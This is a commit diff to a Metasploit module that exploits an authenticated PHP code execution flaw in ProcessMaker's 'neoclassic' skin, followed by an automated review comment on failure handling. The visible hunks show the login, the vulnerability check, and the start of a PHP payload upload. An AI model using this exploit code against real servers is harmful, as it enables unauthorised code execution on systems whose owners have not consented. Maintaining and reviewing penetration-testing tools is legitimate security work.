Clean processmaker_exec
parent
3eed800b85
commit
c4c171d63f
|
@ -15,12 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => "ProcessMaker Open Source Authenticated PHP Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits a PHP code execution vulnerability in the
|
||||
This module exploits a PHP code execution vulnerability in the
|
||||
'neoclassic' skin for ProcessMaker Open Source which allows any
|
||||
authenticated user to execute PHP code.
|
||||
|
||||
The vulnerable skin is installed by default in version 2.x and
|
||||
cannot be removed via the web interface.
|
||||
authenticated user to execute PHP code. The vulnerable skin is
|
||||
installed by default in version 2.x and cannot be removed via
|
||||
the web interface.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
|
||||
|
@ -54,19 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
#
|
||||
# Clean up on new session
|
||||
#
|
||||
def on_new_session(client)
|
||||
print_warning("#{peer} - Deleting #{@fname}")
|
||||
if client.type == "meterpreter"
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
client.fs.file.rm(@fname)
|
||||
else
|
||||
client.shell_command_token("rm #{@fname}")
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Send command for execution
|
||||
#
|
||||
|
@ -116,11 +102,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
|
||||
print_error("#{peer} - Connection failed")
|
||||
return false
|
||||
end
|
||||
if res and res.code == 200 and res.body =~ /Loading styles and images/
|
||||
print_good("#{peer} - Authenticated as user '#{user}'")
|
||||
return true
|
||||
else
|
||||
fail_with(Failure::NoAccess, "#{peer} - Authenticating as user '#{user}' failed")
|
||||
print_error("#{peer} - Authenticating as user '#{user}' failed")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -130,7 +119,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def check
|
||||
# login
|
||||
@cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
|
||||
login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
unless login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
# send check
|
||||
fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10)
|
||||
|
@ -140,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if res and res.body =~ /#{fingerprint}/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
elsif res
|
||||
return Exploit::CheckCode::Detected
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
|
||||
print_error("#{peer} - Connection failed")
|
||||
|
@ -172,14 +163,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
|
||||
end
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
|
||||
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# login
|
||||
@cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
|
||||
login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
unless login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
|
||||
end
|
||||
|
||||
# upload payload
|
||||
@fname = "#{rand_text_alphanumeric(rand(10)+10)}.php"
|
||||
|
|
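Review bot: A network failure inside `login` now surfaces from `exploit` as an authentication failure, because the rescue branch prints "Connection failed" and returns false, and the `unless login(datastore['USERNAME'], datastore['PASSWORD'])` guard maps every false to `fail_with(Failure::NoAccess, "#{peer} - Authentication failed")`. Having the rescue branch `return nil` and letting `exploit` raise `Failure::Unreachable` for nil and `Failure::NoAccess` for false would keep the recorded failure reason accurate. In `check`, the `elsif res` branch appears to end in `return Exploit::CheckCode::Safe` on the new side (the +/- markers are lost in this rendering), so any reply without the fingerprint, including an error page, would be reported as not vulnerable; limiting Safe to `res.code == 200` and returning `Exploit::CheckCode::Unknown` otherwise is the more cautious verdict. The bodies of `login`, `check` and `exploit` continue outside the visible hunks.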